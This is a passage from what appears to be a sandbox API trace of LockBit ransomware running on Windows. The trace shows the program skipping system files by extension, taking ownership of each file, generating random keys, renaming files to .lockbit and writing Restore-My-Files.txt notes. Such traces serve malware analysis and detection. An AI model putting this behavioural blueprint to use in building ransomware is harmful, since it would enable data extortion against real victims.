pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.091] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.091] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.091] CloseHandle (hObject=0x3a0) returned 1 [0085.092] free (_Block=0x77d800) [0085.092] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0085.092] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.092] malloc (_Size=0x40068) returned 0x3e30078 [0085.093] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=4710) returned 1 [0085.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0085.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0085.095] ReadFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0085.188] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.188] malloc (_Size=0xb0) returned 0x1ff1e60 [0085.188] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0085.201] free (_Block=0x1ff1e60) [0085.201] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.201] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.201] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.202] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efaa4ac, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efaa4ac, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x59b9, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Postage_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.202] lstrcmpiW (lpString1=".", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.203] lstrcmpiW (lpString1="..", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.203] PathFindExtensionW (pszPath="Postage_ButtonGraphic.png") returned=".png" [0085.203] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.203] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.203] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.204] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.204] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.204] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.204] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.205] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.205] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.205] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.205] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.205] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.205] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.205] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.206] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.206] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.206] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.206] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Postage_ButtonGraphic.png") returned 1 [0085.206] lstrcmpiW (lpString1="ntldr", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.206] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.206] lstrcmpiW (lpString1="bootsect.bak", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.206] lstrcmpiW (lpString1="autorun.inf", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.206] lstrcmpiW (lpString1="thumbs.db", lpString2="Postage_ButtonGraphic.png") returned 1 [0085.206] lstrcmpiW (lpString1="iconcache.db", lpString2="Postage_ButtonGraphic.png") returned -1 [0085.206] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.206] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned=".png" [0085.206] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.206] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.206] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.206] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.206] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.206] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.207] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.207] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.208] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.lockbit") returned 78 [0085.208] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.210] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.210] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.210] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.211] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.211] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.211] RtlFreeAnsiString (AnsiString="\\") [0085.211] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b8) returned 0x0 [0085.211] malloc (_Size=0x200) returned 0x77d800 [0085.211] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.211] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.211] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.212] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.212] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.213] CloseHandle (hObject=0x3b8) returned 1 [0085.213] free (_Block=0x77d800) [0085.213] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.213] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.213] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.214] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=22969) returned 1 [0085.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.216] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.218] malloc (_Size=0xb2) returned 0x1ff1e60 [0085.218] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xb2, FileInformationClass=0xa) returned 0x0 [0085.219] free (_Block=0x1ff1e60) [0085.219] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0085.219] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0085.219] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.219] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160f, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Postage_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.220] lstrcmpiW (lpString1=".", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.220] lstrcmpiW (lpString1="..", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.220] PathFindExtensionW (pszPath="Postage_SelectionSubpicture.png") returned=".png" [0085.220] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.220] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.220] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.221] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.221] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.222] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.222] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.222] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.222] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Postage_SelectionSubpicture.png") returned 1 [0085.222] lstrcmpiW (lpString1="ntldr", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.222] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.222] lstrcmpiW (lpString1="bootsect.bak", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.222] lstrcmpiW (lpString1="autorun.inf", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.222] lstrcmpiW (lpString1="thumbs.db", lpString2="Postage_SelectionSubpicture.png") returned 1 [0085.222] lstrcmpiW (lpString1="iconcache.db", lpString2="Postage_SelectionSubpicture.png") returned -1 [0085.223] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0085.223] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned=".png" [0085.223] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.223] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.223] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.223] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.224] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.224] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.224] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.224] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.224] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.224] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.lockbit") returned 84 [0085.224] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.225] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.225] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.225] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.225] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.226] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.226] RtlFreeAnsiString (AnsiString="\\") [0085.226] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0085.226] malloc (_Size=0x200) returned 0x77d800 [0085.226] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0085.226] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.226] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.226] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.227] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0085.227] CloseHandle (hObject=0x3bc) returned 1 [0085.227] free (_Block=0x77d800) [0085.227] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0085.228] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.228] malloc (_Size=0x40068) returned 0x3d70048 [0085.229] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5647) returned 1 [0085.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0085.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0085.230] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, 